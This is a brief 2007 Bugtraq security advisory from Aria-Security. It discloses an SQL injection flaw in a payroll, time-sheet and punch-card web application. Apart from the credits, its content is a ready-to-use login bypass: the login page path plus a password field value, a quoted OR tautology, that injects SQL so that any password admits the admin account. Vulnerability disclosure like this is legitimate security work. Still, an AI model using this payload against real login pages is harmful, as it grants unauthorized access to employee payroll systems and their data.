
Date: 28 Jul 2007 00:00:48 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Pay Roll - Time Sheet and Punch Card Application With Web
 Interface SQL Injection

__________________________

A R I A - S E C U R I T Y
_________________________

Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection
Vendor: http://www.codewidgets.com

http://target.com/PATH/login.asp

Username: admin
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
